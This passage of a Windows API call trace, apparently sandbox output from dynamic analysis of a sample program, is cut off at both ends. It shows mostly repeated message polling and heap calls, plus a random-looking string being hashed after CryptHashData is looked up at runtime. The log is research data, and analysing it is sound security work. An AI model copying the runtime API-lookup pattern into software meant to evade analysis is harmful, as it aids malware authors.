wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.127] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0121.127] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.127] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b78 [0121.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.127] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.127] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0121.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.128] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.128] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.132] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.132] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.132] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.132] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.132] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.132] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.132] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sckxjwcnmxupxfyjkysyphxrkregslgdwthrzgquajlplpajub", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0121.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sckxjwcnmxupxfyjkysyphxrkregslgdwthrzgquajlplpajub", cchWideChar=51, lpMultiByteStr=0x1458998, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sckxjwcnmxupxfyjkysyphxrkregslgdwthrzgquajlplpajub", lpUsedDefaultChar=0x0) returned 51 [0121.133] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.133] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.133] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.133] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.133] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.133] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.133] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.133] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.133] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.133] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.133] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.134] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.135] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.135] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.135] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.135] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.135] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.135] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.135] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.135] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.135] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.135] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.135] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.135] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.136] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.136] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.136] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.136] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.136] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.136] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.136] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.136] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0121.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x14bd988, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0121.137] GetProcAddress (hModule=0x77820000, lpProcName="CryptHashData") returned 0x7783fb10 [0121.137] CryptHashData (hHash=0x1458ed8, pbData=0x1458ad8, dwDataLen=0x32, dwFlags=0x1) returned 1 [0121.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb38 | out: hHeap=0x12c0000) returned 1 [0121.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0121.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bda78 | out: hHeap=0x12c0000) returned 1 [0121.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0121.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc88 | out: hHeap=0x12c0000) returned 1 [0121.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb20 [0121.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9e8 [0121.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9d0 [0121.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef930 [0121.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9d0 | out: hHeap=0x12c0000) returned 1 [0121.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0121.138] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9e8 | out: hHeap=0x12c0000) returned 1 [0121.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491998 [0121.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be0a8 [0121.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdad8 [0121.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef960 [0121.138] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb68 [0121.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc28 [0121.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdc58 [0121.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9b0 [0121.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc58 | out: hHeap=0x12c0000) returned 1 [0121.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0121.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc28 | out: hHeap=0x12c0000) returned 1 [0121.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bda18 [0121.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9e8 [0121.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb50 [0121.139] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efab0 [0121.139] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb50 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9e8 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.140] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be048 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7f0 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0121.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3190 | out: hHeap=0x12c0000) returned 1 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaf0 | out: hHeap=0x12c0000) returned 1 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbb0 | out: hHeap=0x12c0000) returned 1 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdac0 | out: hHeap=0x12c0000) returned 1 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdcb8 | out: hHeap=0x12c0000) returned 1 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdc70 | out: hHeap=0x12c0000) returned 1 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdaa8 | out: hHeap=0x12c0000) returned 1 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x133c9b8 | out: hHeap=0x12c0000) returned 1 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0121.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efaa0 | out: hHeap=0x12c0000) returned 1 [0121.143] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff398 [0121.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdb98 [0121.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bdbc8 [0121.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdbc8 | out: hHeap=0x12c0000) returned 1 [0121.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bdb98 | out: hHeap=0x12c0000) returned 1 [0121.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff398 | out: hHeap=0x12c0000) returned 1 [0121.143] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa80 [0121.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0121.144] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.144] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0121.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0121.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0121.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0121.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0121.145] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.145] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0121.145] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0121.145] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8f0 [0121.146] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0121.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0121.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0121.146] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0121.146] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.146] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.146] HeapFree (in: hHeap=0x12c0000, 